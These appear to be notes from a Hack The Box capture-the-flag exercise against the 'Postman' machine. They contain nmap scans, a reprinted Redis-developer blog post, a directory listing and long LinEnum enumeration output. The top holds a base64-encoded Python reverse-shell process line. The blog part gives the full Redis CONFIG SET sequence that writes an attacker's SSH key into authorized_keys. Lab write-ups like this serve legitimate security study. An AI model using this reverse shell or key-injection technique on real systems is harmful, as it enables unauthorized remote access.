HTB - CTB POSTMAN

Postman
root 3503 0.0 0.9 33400 9120 ? S 06:49 0:00

python -c import
base64;exec(base64.b64decode('aW1wb3J0IHNvY2tldCxzdWJwc
import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SO
80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])
1/59
nmap
Nmap scan report for 10.10.10.160
Host is up (0.54s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
(Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77
(RSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45
(ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;
Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect

results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.58
seconds
2/59
dirbuster
3/59
nmap1
Nmap scan report for 10.10.10.160
Host is up (0.50s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
(Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77
(RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89
(ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45
(ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;
Charset=iso-8859-1).
13532/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect

results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2927.64
seconds
4/59
redis vuln.
From time to time I get security reports about Redis. It’s
good to get reports, but it’s odd that what I get is usually
about things like Lua sandbox escaping, insecure temporary
file creation, and similar issues, in a software which is
designed (as we explain in our security page here http://
redis.io/topics/security) to be totally insecure if exposed to
the outside world.
Yet these bug reports are often useful since there are
different levels of security concerning any software in
general and Redis specifically. What you can do if you have
access to the database, just modify the content of the
database itself or compromise the local system where Redis
is running?
How important is a given security layer in a system depends

on its security model. Is a system designed to have
untrusted users accessing it, like a web server
for example? There are different levels of authorization for
different kinds of
users?
The Redis security model is: “it’s totally insecure to let

untrusted clients access the system, please protect it from
the outside world yourself”. The reason is that, basically,
99.99% of the Redis use cases are inside a sandboxed
environment. Security is complex. Adding security features
adds complexity. Complexity for 0.01% of use cases is not
great, but it is a matter of design philosophy, so you may
disagree of course.
The problem is that, whatever we state in our security page,

there are a lot of Redis instances exposed to the internet
unintentionally. Not because the use case requires outside
clients to access Redis, but because nobody bothered to
5/59
protect a given Redis instance from outside accesses via fire
walling, enabling AUTH, binding it to 127.0.0.1 if only local
clients are accessing it, and so forth.
Let’s crack Redis for fun and no profit at all given I’m the
developer of this thing
===
In order to show the Redis “security model” in a cruel way, I

did a quick 5 minutes experiment. In our security page we
hint at big issues if Redis is exposed. You can read:
“However, the ability to control the server configuration
using the CONFIG command makes the client able to change
the working directory of the program and the name of the
dump file. This allows clients to write RDB Redis files at
random paths, that is a security issue that may easily lead to
the ability to run untrusted code as the same user as Redis
is running”.
So my experiment was the following: I’ll run a Redis instance

in my Macbook Air, without touching the computer
configuration compared to what I’ve currently. Now from
another host, my goal is to compromise my laptop.
So, to start let’s check if I can access the instance, which is a

prerequisite:
$ telnet 192.168.1.11 6379

Trying 192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.
6/59
Works, and no AUTH required. Redis is unprotected without a
password set up, and so forth. The simplest thing you can do
in such a case, is to write random files. Guess what? my
Macbook Air happens to run an SSH server. What about
trying to write something into ~/ssh/authorized_keys in
order to gain access?
Let’s start generating a new SSH key:
$ ssh-keygen -t rsa -C "crack@redis.io"

Generating public/private rsa key pair.
Enter file in which to save the key (/home/antirez/.ssh/
id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27
crack@redis.io
The key's randomart image is:
+--[ RSA 2048]----+
| . O+.|
| . o o..o*o|
| = . + .+ . |
| oBo . |
| .oS E.|
| . o |
| |
| |
| |
+-----------------+
Now I’ve a key. My goal is to put it into the Redis server

memory, and later to transfer it into a file, in a way that the
resulting authorized_keys file is still a valid one. Using the
RDB format to do this has the problem that the output will
be binary and may in theory also compress strings. But well,
7/59
maybe this is not a problem. To start let’s pad the public SSH
key I generated with newlines before and after the content:
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
Now foo.txt is just our public key but with newlines. We can
write this string inside the memory of Redis using redis-cli:
$ redis-cli -h 192.168.1.11 flushall

$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit
Looks good. How to dump our memory content into the

authorized_keys file? That’s
kinda trivial.
$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized_keys"
OK
192.168.1.11:6379> save
OK
At this point the target authorized keys file should be full of

garbage, but should also include our public key. The string
does not have simple patterns so it’s unlikely that it was
compressed inside the RDB file. Will ssh be so naive to parse
a totally corrupted file without issues, and accept the only
sane entry inside?
$ ssh -i id_rsa antirez@192.168.1.11

Enter passphrase for key 'id_rsa':
Last login: Mon Nov 2 15:58:43 2015 from 192.168.1.10
~ ➤ hostname
Salvatores-MacBook-Air.local
8/59
Yes. I successfully gained access as the Redis user, with a
proper shell, in like five seconds. Courtesy of a Redis
instance unprotected being, basically, an on-demand-write-
this-file server, and in this case, by ssh not being
conservative enough to deny access to a file which is all
composed of corrupted keys but for one single entry.
However ssh is not the problem here, once you can write
files, even with binary garbage inside, it’s a matter of time
and you’ll gain access to the system in one way or the other.
How to fix this crap?

===
We say Redis is insecure if exposed, and the security model

of Redis is to be accessed only be authorized and trusted
clients. But this is unfortunately not enough. Users will still
run it unprotected, and even worse, there is a tension
between making Redis more secure *against* deployment
errors, and making Redis easy to use for people just using it
for development or inside secure environments where limits
are not needed.
Let’s make an example. Newer versions of Redis ship with

the example redis.conf defaulting to “bind 127.0.0.1”. If you
run the server without arguments, it will still bind all
interfaces, since I don’t want to annoy users which are likely
running Redis for development. To have to reconfigure an
example server just to allow connections from other hosts is
kinda a big price to pay, to win just a little bit of security for
people that don’t care. However the example redis.conf that
many users use as a template for their configuration,
defaults to binding the localhost interface. Hopefully less
deployments errors will be made.
However this measures are not very effective, because

unfortunately what most security unaware users will do after
realizing that binding 127.0.0.1 is preventing them from
9/59
connecting clients from the outside, is to just drop the bind
line and restart. And we are back to the insecure
configuration.
Basically the problem is finding a compromise between the

following three things:
1. Making Redis accessible without annoyances for people

that know what they do.
2. Making Redis less insecure for people that don’t know

what they do.
3. My bias towards “1” instead of “2” because RTFM.
Users ACLs to mitigate the problem

===
One way to add redundancy to the “isolation” concept of

Redis from the outside world is to use the AUTH command.
It’s very simple, you configure Redis in order to require a
password, and clients authenticate via the AUTH command
by using the configured password. The mechanism is trivial:
passwords are not hashed, and are stated in cleartext inside
the configuration file and inside the application, so it’s like a
shared secret.
While this is not resistant against people sniffing your TCP

connections or compromising your application servers, it’s
an effective layer of security against the obvious mistake of
leaving unprotected Redis instances on the internet.
A few notes about AUTH:
1. You can use Redis as an oracle in order to test many

passwords per second, but the password does not need to
be stored inside a human memory, just inside the Redis
config file and client configurations, so pick a very large one,
10/59
and make it impossible to brute force.
2. AUTH is sent when the connection is created, and most

sane applications have persistent connections, so it is a very
small cost to pay. It’s also an extremely fast command to
execute, like GET or SET, disk is not touched nor other
external system.
3. It’s a good layer of protection even for well sandboxed

environments. For an error an instance may end exposed, if
not to the internet, at least to clients that should not be able
to talk with it.
Maybe evolving AUTH is the right path in order to gain more

security, so
some time ago I published a proposal to add “real users” in
Redis: https://github.com/redis/redis-rcp/blob/master/
RCP1.md
This proposal basically adds users with ACLs. It’s very similar
to AUTH in the way it works and in the speed of execution,
but different users have different capabilities. For example
normal users are not able to access administrative
commands by default, so no “CONFIG SET dir” for them, and
no issues like the exploit above.
The default user can yet run the normal commands (so the
patches people sent me about Lua sandboxing, that I
applied, are very useful indeed), and an admin user must be
configured in order to use administration commands.
However what we could do to make Redis more user friendly
is to always have an “admin” user with empty password
which is accepted if the connection comes from the loopback
interface (but it should be possible to disable this feature).
ACLs, while not perfect, have certain advantages. When

Redis is exposed to the internet in the proper way, proxied
via SSL, to have an additional layer of access control is very
11/59
useful. Even when no SSL is used since we have just local
clients, to protect with more fine grained control what clients
can do has several advantages. For instance it can protect
against programming or administration errors: FLUSHALL
and FLUSHDB could be not allowed to normal users, the
client for a Redis monitoring service would use an user only
allowing a few selected commands, and so forth.
Users that don’t care about protecting their instances will stil
have a database which is accessible from the outside, but
without admin commands available, which still makes things
insecure from the point of view of the data contained inside
the database, but more secure from the point of view of the
system running the Redis instance.
Basically it is impossible to reach the goal of making Redis

user friendly by default and resistant against big security
mistakes of users spinning an instance bound to a public IP
address. However fixing bugs in the API that may allow to
execute untrusted code with the same privileges of the Redis
process, shipping a more conservative default configuration,
and implementing multiple users with ACLs, could improve
the current state of Redis security without impacting much
the experience of normal Redis users that know what they
are doing.
Moreover ACLs have the advantage of allowing application

developers to create
users that match the actual limits of specific clients in the
context of the
application logic, making mistakes less likely to create big
issues.
A drawback of even this simple layer of security is that it

adds complexity,
especially in the context of replication, Redis Sentinel, and
other systems that
must all be authentication aware in order to work well in this
12/59
new context. However it’s probably an effort that must be
incrementally done.
Hacker News: http://antirez.com/news/96
Reddit: https://www.reddit.com/r/redis/comments/3rby8c/
a_few_things_about_redis_security/
13/59
redis
total 660
drwxr-x--- 7 redis redis 4096 Nov 16 06:36 .
drwxr-xr-x 37 root root 4096 Aug 25 21:24 ..
drwxr-xr-x 2 root root 4096 Oct 25 15:21 6379
-rw------- 1 redis redis 399 Oct 25 14:43 .bash_history
drwx------ 2 redis redis 4096 Aug 25 23:46 .cache
-rw-r----- 1 redis redis 46760 Aug 26 01:40 dkixshbr.so
-rw-rw---- 1 redis redis 92 Nov 16 06:36 dump.rdb
drwx------ 3 redis redis 4096 Aug 25 23:46 .gnupg
-rw-r----- 1 redis redis 46760 Aug 25 22:26 ibortfgq.so
drwxrwxr-x 3 redis redis 4096 Aug 26 02:31 .local
-rw-r----- 1 redis redis 440656 Aug 25 22:54 module.o
-rw-r----- 1 redis redis 46760 Aug 25 22:21 qcbxxlig.so
drwxr-xr-x 2 redis root 4096 Nov 16 06:48 .ssh
-rw-r----- 1 redis redis 46760 Aug 25 22:22 vlpaulhk.so
dump.rdb
REDIS0008 redis-ver4.0.9
redis-bits@ctimeused-mem8
aof-preamble+p>
contents of 6379
dump.rdb
REDIS0009 redis-ver5.0.0
redis-bits@ctimeused-memx
aof-preamble W__
content of /var/www
SimpleHTTPPutServer.py
14/59
# python -m SimpleHTTPPutServer 8080
import SimpleHTTPServer
import BaseHTTPServer
class SputHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHand
def do_PUT(self):
print self.headers
length = int(self.headers["Content-Length"])
path = self.translate_path(self.path)
with open(path, "wb") as dst:
dst.write(self.rfile.read(length))
if __name__ == '__main__':
SimpleHTTPServer.test(HandlerClass=SputHTTPRequestHandler)
15/59
LinEnum
#######################################
# Local Linux Enumeration & Privilege Escalation Script #
#######################################
# www.rebootuser.com
# version 0.98
[-] Debug Info

[+] Thorough tests = Disabled
Scan started at:

Wed Nov 20 06:51:20 GMT 2019
### SYSTEM
#######################################
[-] Kernel information:
Linux Postman 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6
11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
[-] Kernel information (continued):

Linux version 4.15.0-58-generic (buildd@lcy01-amd64-013)
(gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04.1)) #64-
Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019
[-] Specific release information:

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
16/59
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-
and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
[-] Hostname:
Postman
### USER/GROUP
#######################################
[-] Current user/group info:
uid=107(redis) gid=114(redis) groups=114(redis)
[-] Users that have previously logged onto the system:

Username Port From Latest
root pts/0 10.10.14.3 Tue Oct 29 09:26:37
+0000 2019
Matt pts/4 192.168.1.4 Mon Aug 26 00:04:37
+0100 2019
redis pts/0 10.10.16.8 Wed Nov 20 06:48:31
+0000 2019
[-] Who else is logged on:

06:51:20 up 17 min, 1 user, load average: 0.09, 0.21, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU
WHAT
redis pts/0 10.10.16.8 06:48 8.00s 0.01s 0.00s /
17/59
bin/bash ./LinEnum.sh
[-] Group memberships:

uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup)
groups=65534(nogroup)
uid=100(systemd-network) gid=102(systemd-network)
groups=102(systemd-network)
uid=101(systemd-resolve) gid=103(systemd-resolve)
groups=103(systemd-resolve)
uid=102(syslog) gid=106(syslog) groups=106(syslog),
4(adm)
uid=103(messagebus) gid=107(messagebus)
groups=107(messagebus)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(uuidd) gid=109(uuidd) groups=109(uuidd)
uid=106(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
uid=107(redis) gid=114(redis) groups=114(redis)
18/59
[-] It looks like we have some admin users:
uid=102(syslog) gid=106(syslog) groups=106(syslog),
4(adm)
[-] Contents of /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/
gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network
Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/
systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
redis:x:107:114::/var/lib/redis:/bin/bash
19/59
[-] Super user account(s):
root
[-] Are permissions on /home directories lax:

total 12K
drwxr-xr-x 3 root root 4.0K Sep 11 11:27 .
drwxr-xr-x 22 root root 4.0K Aug 25 15:03 ..
drwxr-xr-x 6 Matt Matt 4.0K Sep 11 11:28 Matt
[-] Root is allowed to login via SSH:

PermitRootLogin yes
### ENVIRONMENTAL
#######################################
[-] Environment information:
SSH_CONNECTION=10.10.16.8 44362 10.10.10.160 22
LANG=en_US.UTF-8
XDG_SESSION_ID=4
USER=redis
PWD=/var/lib/redis
HOME=/var/lib/redis
SSH_CLIENT=10.10.16.8 44362 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/redis
SHELL=/bin/bash
TERM=xterm-256color
SHLVL=2
LOGNAME=redis
XDG_RUNTIME_DIR=/run/user/107
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/
bin:/usr/games:/usr/local/games
_=/usr/bin/env
[-] Path information:

20/59
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/
games:/usr/local/games
[-] Available shells:

# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/rbash
/bin/dash
[-] Current umask value:

0002
u=rwx,g=rwx,o=rx
[-] umask value as specified in /etc/login.defs:

UMASK 022
[-] Password and storage information:

PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512
### JOBS/TASKS
#######################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Nov 16 2017 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Aug 25 18:44 .
drwxr-xr-x 81 root root 4096 Oct 25 16:44 ..
-rw-r--r-- 1 root root 712 Jan 17 2018 php
21/59
-rw-r--r-- 1 root root 102 Nov 16 2017 .placeholder
-rw-r--r-- 1 root root 191 Aug 24 11:33 popularity-contest
/etc/cron.daily:
total 56
-rwxr-xr-x 1 root root 539 Jul 16 19:14 apache2
-rwxr-xr-x 1 root root 1478 Apr 20 2018 apt-compat
-rwxr-xr-x 1 root root 77 Sep 5 2008 apt-show-versions
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1176 Nov 2 2017 dpkg
-rwxr-xr-x 1 root root 372 Aug 21 2017 logrotate
-rwxr-xr-x 1 root root 1065 Apr 7 2018 man-db
-rwxr-xr-x 1 root root 538 Mar 1 2018 mlocate
-rwxr-xr-x 1 root root 249 Jan 25 2018 passwd
-rwxr-xr-x 1 root root 3477 Feb 21 2018 popularity-contest
-rwxr-xr-x 1 root root 246 Mar 21 2018 ubuntu-advantage-
tools
/etc/cron.hourly:
total 12
/etc/cron.monthly:
total 12
/etc/cron.weekly:
total 16
-rwxr-xr-x 1 root root 723 Apr 7 2018 man-db
22/59
[-] Crontab contents:

# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the
`crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username
fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command

17 * *** root cd / && run-parts --report /etc/
cron.hourly
25 6 *** root test -x /usr/sbin/anacron || ( cd /
&& run-parts --report /etc/cron.daily )
47 6 **7 root test -x /usr/sbin/anacron || ( cd /
&& run-parts --report /etc/cron.weekly )
52 6 1** root test -x /usr/sbin/anacron || ( cd /
&& run-parts --report /etc/cron.monthly )
#
[-] Systemd timers:

NEXT LEFT LAST
PASSED UNIT ACTIVATES
Wed 2019-11-20 07:09:00 GMT 17min left Wed 2019-11-20
06:39:00 GMT 12min ago phpsessionclean.timer
phpsessionclean.service
Wed 2019-11-20 14:57:12 GMT 8h left Wed 2019-11-20
06:33:43 GMT 17min ago motd-news.timer motd-
news.service
Wed 2019-11-20 18:00:00 GMT 11h left Wed 2019-11-20
06:33:43 GMT 17min ago apt-daily.timer apt-
23/59
daily.service
Thu 2019-11-21 06:16:03 GMT 23h left Wed 2019-11-20
06:33:43 GMT 17min ago apt-daily-upgrade.timer apt-
daily-upgrade.service
Thu 2019-11-21 06:48:50 GMT 23h left Wed 2019-11-20
06:48:50 GMT 2min 34s ago systemd-tmpfiles-clean.timer
systemd-tmpfiles-clean.service
Mon 2019-11-25 00:00:00 GMT 4 days left Wed 2019-11-20
06:33:43 GMT 17min ago fstrim.timer
fstrim.service
6 timers listed.
Enable thorough tests to see inactive timers
### NETWORKING
#######################################
[-] Network and IP info:
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>
mtu 1500
inet 10.10.10.160 netmask 255.255.255.0 broadcast
10.10.10.255
inet6 dead:beef::250:56ff:febd:5342 prefixlen 64
scopeid 0x0<global>
inet6 fe80::250:56ff:febd:5342 prefixlen 64 scopeid
0x20<link>
ether 00:50:56:bd:53:42 txqueuelen 1000 (Ethernet)
RX packets 95573 bytes 8588335 (8.5 MB)
RX errors 7 dropped 10 overruns 0 frame 0
TX packets 93836 bytes 21317325 (21.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 3206 bytes 231248 (231.2 KB)
24/59
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3206 bytes 231248 (231.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
[-] ARP history:

_gateway (10.10.10.2) at 00:50:56:bd:e2:c6 [ether] on ens33
[-] Nameserver(s):
nameserver 127.0.0.53
[-] Nameserver(s):
Global
DNSSEC NTA: 10.in-addr.arpa
16.172.in-addr.arpa
168.192.in-addr.arpa
17.172.in-addr.arpa
18.172.in-addr.arpa
19.172.in-addr.arpa
20.172.in-addr.arpa
21.172.in-addr.arpa
22.172.in-addr.arpa
23.172.in-addr.arpa
24.172.in-addr.arpa
25.172.in-addr.arpa
26.172.in-addr.arpa
27.172.in-addr.arpa
28.172.in-addr.arpa
29.172.in-addr.arpa
30.172.in-addr.arpa
31.172.in-addr.arpa
corp
d.f.ip6.arpa
home
internal
intranet
25/59
lan
local
private
test
Link 2 (ens33)
Current Scopes: none
LLMNR setting: yes
MulticastDNS setting: no
DNSSEC setting: no
DNSSEC supported: no
[-] Default route:

default _gateway 0.0.0.0 UG 0 0 0
ens33
[-] Listening TCP:

Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign
Address State PID/Program name
tcp 0 0 0.0.0.0:6379 0.0.0.0:*
LISTEN 585/redis-server 0.
tcp 0 0 0.0.0.0:10000 0.0.0.0:*
LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:*
LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:*
LISTEN -
tcp6 0 0 ::1:6379 :::* LISTEN
585/redis-server 0.
tcp6 0 0 :::80 :::* LISTEN
-
tcp6 0 0 :::22 :::* LISTEN
-
26/59
[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign
Address State PID/Program name
udp 0 0 0.0.0.0:10000
0.0.0.0:* -
udp 0 0 127.0.0.53:53
0.0.0.0:* -
### SERVICES
#######################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START
TIME COMMAND
root 1 0.1 0.7 159396 7160 ? Ss 06:33 0:02 /
sbin/init splash
root 2 0.0 0.0 0 0? S 06:33 0:00
[kthreadd]
root 4 0.0 0.0 0 0? I< 06:33 0:00
[kworker/0:0H]
root 6 0.0 0.0 0 0? I< 06:33 0:00
[mm_percpu_wq]
root 7 0.0 0.0 0 0? S 06:33 0:00
[ksoftirqd/0]
root 8 0.0 0.0 0 0? I 06:33 0:00
[rcu_sched]
root 9 0.0 0.0 0 0? I 06:33 0:00 [rcu_bh]
root 10 0.0 0.0 0 0? S 06:33 0:00
[migration/0]
root 11 0.0 0.0 0 0? S 06:33 0:00
[watchdog/0]
root 12 0.0 0.0 0 0? S 06:33 0:00 [cpuhp/
0]
root 13 0.0 0.0 0 0? S 06:33 0:00
[kdevtmpfs]
root 14 0.0 0.0 0 0? I< 06:33 0:00 [netns]
root 15 0.0 0.0 0 0? S 06:33 0:00
27/59
[rcu_tasks_kthre]
root 16 0.0 0.0 0 0? S 06:33 0:00
[kauditd]
root 17 0.0 0.0 0 0? S 06:33 0:00
[khungtaskd]
root 18 0.0 0.0 0 0? S 06:33 0:00
[oom_reaper]
root 19 0.0 0.0 0 0? I< 06:33 0:00
[writeback]
root 20 0.0 0.0 0 0? S 06:33 0:00
[kcompactd0]
root 21 0.0 0.0 0 0? SN 06:33 0:00 [ksmd]
root 22 0.0 0.0 0 0? SN 06:33 0:00
[khugepaged]
root 23 0.0 0.0 0 0? I< 06:33 0:00
[crypto]
root 24 0.0 0.0 0 0? I< 06:33 0:00
[kintegrityd]
root 25 0.0 0.0 0 0? I< 06:33 0:00
[kblockd]
root 26 0.0 0.0 0 0? I< 06:33 0:00
[ata_sff]
root 27 0.0 0.0 0 0? I< 06:33 0:00 [md]
root 28 0.0 0.0 0 0? I< 06:33 0:00 [edac-
poller]
root 29 0.0 0.0 0 0? I< 06:33 0:00
[devfreq_wq]
root 30 0.0 0.0 0 0? I< 06:33 0:00
[watchdogd]
root 32 0.0 0.0 0 0? I 06:33 0:00
[kworker/0:1]
root 34 0.0 0.0 0 0? S 06:33 0:00
[kswapd0]
root 35 0.0 0.0 0 0? I< 06:33 0:00
[kworker/u257:0]
root 36 0.0 0.0 0 0? S 06:33 0:00
[ecryptfs-kthrea]
root 78 0.0 0.0 0 0? I< 06:33 0:00
28/59
[kthrotld]
root 79 0.0 0.0 0 0? I< 06:33 0:00
[acpi_thermal_pm]
root 80 0.0 0.0 0 0? S 06:33 0:00
[scsi_eh_0]
root 81 0.0 0.0 0 0? I< 06:33 0:00
[scsi_tmf_0]
root 82 0.0 0.0 0 0? S 06:33 0:00
[scsi_eh_1]
root 83 0.0 0.0 0 0? I< 06:33 0:00
[scsi_tmf_1]
root 85 0.0 0.0 0 0? I 06:33 0:00
[kworker/0:2]
root 90 0.0 0.0 0 0? I< 06:33 0:00
[ipv6_addrconf]
root 99 0.0 0.0 0 0? I< 06:33 0:00 [kstrp]
root 116 0.0 0.0 0 0? I< 06:33 0:00
[charger_manager]
root 117 0.0 0.0 0 0? I 06:33 0:00
[kworker/u256:4]
root 169 0.0 0.0 0 0? I< 06:33 0:00
[mpt_poll_0]
root 170 0.0 0.0 0 0? I< 06:33 0:00 [mpt/
0]
root 172 0.0 0.0 0 0? I< 06:33 0:00
[kworker/0:1H]
root 173 0.0 0.0 0 0? S 06:33 0:00
[scsi_eh_2]
root 174 0.0 0.0 0 0? I< 06:33 0:00
[scsi_tmf_2]
root 195 0.0 0.0 0 0? S 06:33 0:00 [jbd2/
sda1-8]
root 196 0.0 0.0 0 0? I< 06:33 0:00 [ext4-
rsv-conver]
root 240 0.0 0.8 78460 8240 ? S<s 06:33 0:00 /
lib/systemd/systemd-journald
root 251 0.0 0.4 45196 3756 ? Ss 06:33 0:00 /
lib/systemd/systemd-udevd
29/59
systemd+ 329 0.0 0.3 70628 3320 ? Ss 06:33
0:00 /lib/systemd/systemd-resolved
systemd+ 331 0.0 0.2 141928 1848 ? Ssl 06:33
0:00 /lib/systemd/systemd-timesyncd
root 332 0.0 1.2 170344 11096 ? Ssl 06:33 0:00 /
usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-
triggers
syslog 339 0.0 0.4 263036 4024 ? Ssl 06:33 0:00 /
usr/sbin/rsyslogd -n
root 340 0.0 0.5 289844 4684 ? Ssl 06:33 0:00 /
usr/lib/accountsservice/accounts-daemon
root 344 0.0 0.2 31320 2700 ? Ss 06:33 0:00 /
usr/sbin/cron -f
root 347 0.0 0.5 70608 4876 ? Ss 06:33 0:00 /
lib/systemd/systemd-logind
